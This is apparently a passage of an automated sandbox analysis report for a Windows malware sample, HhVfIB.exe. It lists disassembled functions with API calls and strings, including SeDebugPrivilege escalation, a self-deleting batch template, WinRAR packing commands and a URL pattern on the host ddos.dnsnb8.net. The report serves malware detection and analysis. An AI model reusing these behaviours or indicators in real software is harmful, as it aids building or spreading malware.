                    • Associated: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: Virtual$Free$Alloc
                    • String ID:
                    • API String ID: 1852963964-0
                    • Opcode ID: f2641b90ccfebecc50973f1bf0241e7392d8aa1f08252c2e19e322b598841e07
                    • Instruction ID: 17f72c2e5f5e39416001a8f19eed65e139526d903187bc84d4787ebf91d5f2b0
                    • Opcode Fuzzy Hash: f2641b90ccfebecc50973f1bf0241e7392d8aa1f08252c2e19e322b598841e07
                    • Instruction Fuzzy Hash: 57116D32A00649AFCF318E58DC817DD37A1EF05701F690419DE899F292DE71A985CBA8

                    Non-executed Functions

                    Function 00D1119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON
                    Download Yara Rule
                    APIs
                    • GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe,?,?,?,?,?,?,00D113EF), ref: 00D111AB
                    • OpenProcessToken.ADVAPI32(00000000,00000028,00D113EF,?,?,?,?,?,?,00D113EF), ref: 00D111BB
                    • AdjustTokenPrivileges.ADVAPI32(00D113EF,00000000,?,00000010,00000000,00000000), ref: 00D111EB
                    • CloseHandle.KERNEL32(00D113EF), ref: 00D111FA
                    • CloseHandle.KERNEL32(?,?,?,?,?,?,?,00D113EF), ref: 00D11203
                    Strings
                    • C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe, xrefs: 00D111A5
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
                    • String ID: C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe
                    • API String ID: 75692138-398092939
                    • Opcode ID: ebda61c8299399a4a791a3228c6c452542a991188ae16e18c80cb6ee41eb08f6
                    • Instruction ID: bac59a9e21dcc193a1b94d5d10c17f881eb1844a4bc75dfb4013fc6b234a1963
                    • Opcode Fuzzy Hash: ebda61c8299399a4a791a3228c6c452542a991188ae16e18c80cb6ee41eb08f6
                    • Instruction Fuzzy Hash: FB01D675900309FFDB00DFD4D989AEEBBB8FB08345F108569E605E2250DB715F859B60
                    Function 00D1239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON
                    Download Yara Rule
                    APIs
                    • strstr.MSVCRT ref: 00D123CC
                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00D12464
                    • GetFileSize.KERNEL32(00000000,00000000), ref: 00D12472
                    • CloseHandle.KERNEL32(?,00000000,00000000), ref: 00D124A8
                    • memset.MSVCRT ref: 00D124B9
                    • strrchr.MSVCRT ref: 00D124C9
                    • wsprintfA.USER32 ref: 00D124DE
                    • strrchr.MSVCRT ref: 00D124ED
                    • memset.MSVCRT ref: 00D124F2
                    • memset.MSVCRT ref: 00D12505
                    • wsprintfA.USER32 ref: 00D12524
                    • Sleep.KERNEL32(000007D0), ref: 00D12535
                    • Sleep.KERNEL32(000007D0), ref: 00D1255D
                    • memset.MSVCRT ref: 00D1256E
                    • wsprintfA.USER32 ref: 00D12585
                    • memset.MSVCRT ref: 00D125A6
                    • wsprintfA.USER32 ref: 00D125CA
                    • Sleep.KERNEL32(000007D0), ref: 00D125D0
                    • Sleep.KERNEL32(000007D0,?,?), ref: 00D125E5
                    • CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00D125FC
                    • CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00D12611
                    • SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00D12642
                    • WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00D1265B
                    • SetEndOfFile.KERNEL32 ref: 00D1266D
                    • CloseHandle.KERNEL32(00000000), ref: 00D12676
                    • RemoveDirectoryA.KERNEL32(?), ref: 00D12681
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
                    • String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user~1\AppData\Local\Temp\
                    • API String ID: 2203340711-1252250577
                    • Opcode ID: 320be4c0ae31448cb7a329d41b297d2c2b46d5b33a3d0e8b2cb6ae68fe998365
                    • Instruction ID: c94ef123a0493e93a0276a6c866049b13e2cf50616fc80b6aeaf9b7b1852ebb5
                    • Opcode Fuzzy Hash: 320be4c0ae31448cb7a329d41b297d2c2b46d5b33a3d0e8b2cb6ae68fe998365
                    • Instruction Fuzzy Hash: B481ADB1504344BBD710DF64EC49EEBBBECEB88704F00451AF684D2290DB75DA998BB6
                    Function 00D1274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00D12766
                    • memset.MSVCRT ref: 00D12774
                    • SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00D12787
                    • wsprintfA.USER32 ref: 00D127AB
                      • Part of subcall function 00D1185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A38400,http://%s:%d/%s/%s,?,?,?,00D11118), ref: 00D11867
                      • Part of subcall function 00D1185B: srand.MSVCRT ref: 00D11878
                      • Part of subcall function 00D1185B: rand.MSVCRT ref: 00D11880
                      • Part of subcall function 00D1185B: srand.MSVCRT ref: 00D11890
                      • Part of subcall function 00D1185B: rand.MSVCRT ref: 00D11894
                    • wsprintfA.USER32 ref: 00D127C6
                    • CopyFileA.KERNEL32(?,00D14C80,00000000), ref: 00D127D4
                    • wsprintfA.USER32 ref: 00D127F4
                      • Part of subcall function 00D11973: PathFileExistsA.SHLWAPI(00D14E5C,00000000,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe), ref: 00D11992
                      • Part of subcall function 00D11973: CreateFileA.KERNEL32(00D14E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00D119BA
                      • Part of subcall function 00D11973: Sleep.KERNEL32(00000064), ref: 00D119C6
                      • Part of subcall function 00D11973: wsprintfA.USER32 ref: 00D119EC
                      • Part of subcall function 00D11973: CopyFileA.KERNEL32(00D14E5C,?,00000000), ref: 00D11A00
                      • Part of subcall function 00D11973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00D11A1E
                      • Part of subcall function 00D11973: GetFileSize.KERNEL32(00D14E5C,00000000), ref: 00D11A2C
                      • Part of subcall function 00D11973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00D11A46
                      • Part of subcall function 00D11973: ReadFile.KERNEL32(00D14E5C,00D14E60,00000000,?,00000000), ref: 00D11A65
                    • DeleteFileA.KERNEL32(?,?,00D14E54,00D14E58), ref: 00D1281A
                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00D14E54,00D14E58), ref: 00D12832
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
                    • String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user~1\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
                    • API String ID: 692489704-4282063453
                    • Opcode ID: e088a73860c426383d33553d7db2df01ee546fbae717e4cf1eec6664484fa541
                    • Instruction ID: 64da6fce1f41272367ec3daa9ed06abaac46303505073f51012fd83355c6d5c5
                    • Opcode Fuzzy Hash: e088a73860c426383d33553d7db2df01ee546fbae717e4cf1eec6664484fa541
                    • Instruction Fuzzy Hash: 3A2130B694031C7FDB10EBA4AC89FEB77ACEB14744F0045A1B654E2141EE709FC98AB4
                    Function 00D11581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON
                    Download Yara Rule
                    APIs
                      • Part of subcall function 00D1185B: GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A38400,http://%s:%d/%s/%s,?,?,?,00D11118), ref: 00D11867
                      • Part of subcall function 00D1185B: srand.MSVCRT ref: 00D11878
                      • Part of subcall function 00D1185B: rand.MSVCRT ref: 00D11880
                      • Part of subcall function 00D1185B: srand.MSVCRT ref: 00D11890
                      • Part of subcall function 00D1185B: rand.MSVCRT ref: 00D11894
                    • wsprintfA.USER32 ref: 00D115AA
                    • wsprintfA.USER32 ref: 00D115C6
                    • lstrlen.KERNEL32(?), ref: 00D115D2
                    • CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00D115EE
                    • WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00D11609
                    • CloseHandle.KERNEL32(00000000), ref: 00D11612
                    • ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00D1162D
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
                    • String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe$open
                    • API String ID: 617340118-3579550821
                    • Opcode ID: b3dcb789d9e9d43b4516c4b5a575ac932f1dad0e823f3d6c087b309e0396aee3
                    • Instruction ID: 80f54a79115c1bd9ea1fef6ff8beeb73ceefde8942b4c0399ea2b04bc0f4c65d
                    • Opcode Fuzzy Hash: b3dcb789d9e9d43b4516c4b5a575ac932f1dad0e823f3d6c087b309e0396aee3
                    • Instruction Fuzzy Hash: 6A1151B6A412287ED72097A4EC89DEB7AACDF59761F000051FA49E2140DE709BC98BB0
                    Function 00D1120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00D11400), ref: 00D11226
                    • GetProcAddress.KERNEL32(00000000), ref: 00D1122D
                    • GetCurrentProcessId.KERNEL32(?,?,?,?,00D11400), ref: 00D1123F
                    • OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00D11400), ref: 00D11250
                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe,?,?,?,?,00D11400), ref: 00D1129E
                    • VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe,?,?,?,?,00D11400), ref: 00D112B0
                    • CloseHandle.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe,?,?,?,?,00D11400), ref: 00D112F5
                    • VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00D11400), ref: 00D1130A
                    Strings
                    • ntdll.dll, xrefs: 00D11219
                    • C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe, xrefs: 00D11262
                    • ZwQuerySystemInformation, xrefs: 00D11212
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
                    • String ID: C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe$ZwQuerySystemInformation$ntdll.dll
                    • API String ID: 1500695312-112370166
                    • Opcode ID: b1aeedf7fe9d038553fb40d35fbc97b8dfd6d34b8c8e65dc0db0c7e766a32223
                    • Instruction ID: da5ff15f19dc43f8530bd2649709e7e235fd3dec9cdb06886bb3cb75bb21f812
                    • Opcode Fuzzy Hash: b1aeedf7fe9d038553fb40d35fbc97b8dfd6d34b8c8e65dc0db0c7e766a32223
                    • Instruction Fuzzy Hash: 1621D775605311BBD7209F55EC06BEBBAE8FB4AB00F144918F645D6240CF70DA85C7B9
                    Function 00D1185B Relevance: 12.3, APIs: 5, Strings: 2, Instructions: 31timeCOMMON
                    Download Yara Rule
                    APIs
                    • GetSystemTimeAsFileTime.KERNEL32(?,ddos.dnsnb8.net,75A38400,http://%s:%d/%s/%s,?,?,?,00D11118), ref: 00D11867
                    • srand.MSVCRT ref: 00D11878
                    • rand.MSVCRT ref: 00D11880
                    • srand.MSVCRT ref: 00D11890
                    • rand.MSVCRT ref: 00D11894
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: Timerandsrand$FileSystem
                    • String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
                    • API String ID: 4106363736-3273462101
                    • Opcode ID: f516785a0357b9c41bfda1e66f35ff3f2f1cb9d4ab2e0c185f459d3e8a61819d
                    • Instruction ID: bfe0975ac585f0501826bef6a08f85986315323fa43f25b3771c0561c6d9caa8
                    • Opcode Fuzzy Hash: f516785a0357b9c41bfda1e66f35ff3f2f1cb9d4ab2e0c185f459d3e8a61819d
                    • Instruction Fuzzy Hash: 90E09277A00318BBDB00ABA9EC468DEBBECDE88161B100566F600D3250E970E9458AB4
                    Function 00D12692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,771AE800,?,?,00D129DB,?,00000001), ref: 00D126A7
                    • WaitForSingleObject.KERNEL32(00000000,000000FF,771AE800,?,?,00D129DB,?,00000001), ref: 00D126B5
                    • lstrlen.KERNEL32(?), ref: 00D126C4
                    • ??2@YAPAXI@Z.MSVCRT ref: 00D126CE
                    • lstrcpy.KERNEL32(00000004,?), ref: 00D126E3
                    • lstrcpy.KERNEL32(?,00000004), ref: 00D1271F
                    • ??3@YAXPAX@Z.MSVCRT ref: 00D1272D
                    • SetEvent.KERNEL32 ref: 00D1273C
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: Eventlstrcpy$??2@??3@CreateObjectSingleWaitlstrlen
                    • String ID:
                    • API String ID: 41106472-0
                    • Opcode ID: 021dc1fdd124ae8460adfb88a7011a5c39bba05f762535624be0b47befd44ca1
                    • Instruction ID: fb2f872de2aeaf8dec922156a115b1f6d23bfafe8811b644a5619eb504b61f49
                    • Opcode Fuzzy Hash: 021dc1fdd124ae8460adfb88a7011a5c39bba05f762535624be0b47befd44ca1
                    • Instruction Fuzzy Hash: 6C113A75501310BFCB219F55FC488EA7BA9FB857217288025F454C7360DE319A96DBB0
                    Function 00D11B8A Relevance: 10.6, APIs: 5, Strings: 2, Instructions: 81stringCOMMON
                    Download Yara Rule
                    APIs
                    Strings
                    • .exe, xrefs: 00D11C57
                    • lKOOgkiAoCPNiQOwVZTYiLVRWpoMYrdksIDzFXEHRmPUZxgRrdQLunjGaEFVFtzpMBejnNqvJcKejlGqbzHEIsaLbMKCSxbAhewtcfXUGNTUDJumfaImnWvyPpSQhYgtyuJBlrcvHxDSBZfsqwWAXCkTyohd, xrefs: 00D11B8A, 00D11B9C, 00D11C15, 00D11C49
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: lstrcatmemcpymemsetrandsrand
                    • String ID: .exe$lKOOgkiAoCPNiQOwVZTYiLVRWpoMYrdksIDzFXEHRmPUZxgRrdQLunjGaEFVFtzpMBejnNqvJcKejlGqbzHEIsaLbMKCSxbAhewtcfXUGNTUDJumfaImnWvyPpSQhYgtyuJBlrcvHxDSBZfsqwWAXCkTyohd
                    • API String ID: 122620767-3228080220
                    • Opcode ID: f7764a8fc2232496f249f6636b9dd9a49b707e9fc1ca46925d494cff98943dd2
                    • Instruction ID: cffc95eaabfb2b78e42c2607c2a38205c355d318ed0672dcc6b775f825fdf2c7
                    • Opcode Fuzzy Hash: f7764a8fc2232496f249f6636b9dd9a49b707e9fc1ca46925d494cff98943dd2
                    • Instruction Fuzzy Hash: FC21BE26E093907ED71513397C41BE93F45CFA7710F2D8099F6858B292DD6409C782B4
                    Function 00D1189D Relevance: 9.1, APIs: 6, Instructions: 51processsynchronizationCOMMON
                    Download Yara Rule
                    APIs
                    • memset.MSVCRT ref: 00D118B1
                    • CreateProcessA.KERNEL32(00000000,?,00000000,00000000,00000001,0C000000,00000000,00000000,?,?,000007D0,771B0F00,75A38400), ref: 00D118D3
                    • CloseHandle.KERNEL32(00D12549), ref: 00D118E9
                    • WaitForSingleObject.KERNEL32(?,000000FF), ref: 00D118F0
                    • GetExitCodeProcess.KERNEL32(?,00D12549), ref: 00D11901
                    • CloseHandle.KERNEL32(?), ref: 00D1190A
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: CloseHandleProcess$CodeCreateExitObjectSingleWaitmemset
                    • String ID:
                    • API String ID: 876959470-0
                    • Opcode ID: 25ebac0df347ed7956db5b394ee6bfad345139413cd8c8860497708ff7411a11
                    • Instruction ID: ac3c661c3855acafc877f09c23956798e180661fe283c70702b712325cfba729
                    • Opcode Fuzzy Hash: 25ebac0df347ed7956db5b394ee6bfad345139413cd8c8860497708ff7411a11
                    • Instruction Fuzzy Hash: C4017176901228BBCB216FD6EC48DDF7F7DEF85760F104021FA15E51A0DA314A59CAB0
                    Function 00D1139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON
                    Download Yara Rule
                    APIs
                    • GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe), ref: 00D113BC
                    • LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00D113DA
                    • GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00D11448
                      • Part of subcall function 00D1119F: GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe,?,?,?,?,?,?,00D113EF), ref: 00D111AB
                      • Part of subcall function 00D1119F: OpenProcessToken.ADVAPI32(00000000,00000028,00D113EF,?,?,?,?,?,?,00D113EF), ref: 00D111BB
                      • Part of subcall function 00D1119F: AdjustTokenPrivileges.ADVAPI32(00D113EF,00000000,?,00000010,00000000,00000000), ref: 00D111EB
                      • Part of subcall function 00D1119F: CloseHandle.KERNEL32(00D113EF), ref: 00D111FA
                      • Part of subcall function 00D1119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00D113EF), ref: 00D11203
                    Strings
                    • SeDebugPrivilege, xrefs: 00D113D3
                    • C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe, xrefs: 00D113A8
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
                    • String ID: C:\Users\user~1\AppData\Local\Temp\HhVfIB.exe$SeDebugPrivilege
                    • API String ID: 4123949106-4043194365
                    • Opcode ID: 9cf77c7ace19f92f936aa4e01662fec92032bf63a66052513c327f1d9c0a7918
                    • Instruction ID: 0f6b2a75421705c954db547b6c3b605edf70a62a695db4487313c6739ad5fd87
                    • Opcode Fuzzy Hash: 9cf77c7ace19f92f936aa4e01662fec92032bf63a66052513c327f1d9c0a7918
                    • Instruction Fuzzy Hash: 20313F75D00209FADF209BA5AC45FEEBBB8EB55704F244169F614B2141EA709E85CB70
                    Function 00D11319 Relevance: 8.8, APIs: 3, Strings: 2, Instructions: 53libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(ntdll.dll,NtSystemDebugControl,-00000094,-00000094,0000000C,0000000C,00000001), ref: 00D11334
                    • GetProcAddress.KERNEL32(00000000), ref: 00D1133B
                    • memset.MSVCRT ref: 00D11359
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: AddressHandleModuleProcmemset
                    • String ID: NtSystemDebugControl$ntdll.dll
                    • API String ID: 3137504439-2438149413
                    • Opcode ID: c1bc9a7f516127d3fecf73f158eb8d1099ebcbdfd62eb31a9ad7535a800aa6b3
                    • Instruction ID: ad372e38d647e724566a68f95988874e0401d7a2f8e15317aef8372aefb701a6
                    • Opcode Fuzzy Hash: c1bc9a7f516127d3fecf73f158eb8d1099ebcbdfd62eb31a9ad7535a800aa6b3
                    • Instruction Fuzzy Hash: E001617560030DBFDB10DF94BC85AEFBBB8FB55314F04412AFA51E1140DA708695CA71
                    Function 00D11DF6 Relevance: 7.5, APIs: 5, Instructions: 45stringCOMMON
                    Download Yara Rule
                    APIs
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503742068.0000000000D13000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503794252.0000000000D14000.00000004.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmpDownload File
                    Joe Sandbox IDA Plugin
                    • Snapshot File: hcaresult_1_2_d10000_HhVfIB.jbxd
                    Similarity
                    • API ID: strrchr$lstrcmpilstrcpylstrlen
                    • String ID:
                    • API String ID: 3636361484-0
                    • Opcode ID: 6df3c7ef511454b9a6b734f54dd0f9860f469a4eaef40e58f29b5707709a62a4
                    • Instruction ID: 72aea19719190f7447e83ad7cad3dd9cfe064fe3598e71a0c73a238af45e144f
                    • Opcode Fuzzy Hash: 6df3c7ef511454b9a6b734f54dd0f9860f469a4eaef40e58f29b5707709a62a4
                    • Instruction Fuzzy Hash: 4A018B769043157FEB105BA0FC49BD67BDCDB05351F144065FA45D2190EEB49AC5CBB0
                    Function 00D16014 Relevance: 5.3, APIs: 2, Strings: 1, Instructions: 36libraryloaderCOMMON
                    Download Yara Rule
                    APIs
                    • GetModuleHandleA.KERNEL32(kernel32.dll), ref: 00D1603C
                    • GetProcAddress.KERNEL32(00000000,00D16064), ref: 00D1604F
                    Strings
                    Memory Dump Source
                    • Source File: 00000001.00000002.1503831195.0000000000D16000.00000040.00000001.01000000.00000004.sdmp, Offset: 00D10000, based on PE: true
                    • Associated: 00000001.00000002.1503661329.0000000000D10000.00000002.00000001.01000000.00000004.sdmpDownload File
                    • Associated: 00000001.00000002.1503697158.0000000000D11000.00000020.00000001.01000000.00000004.sdmpDownload File
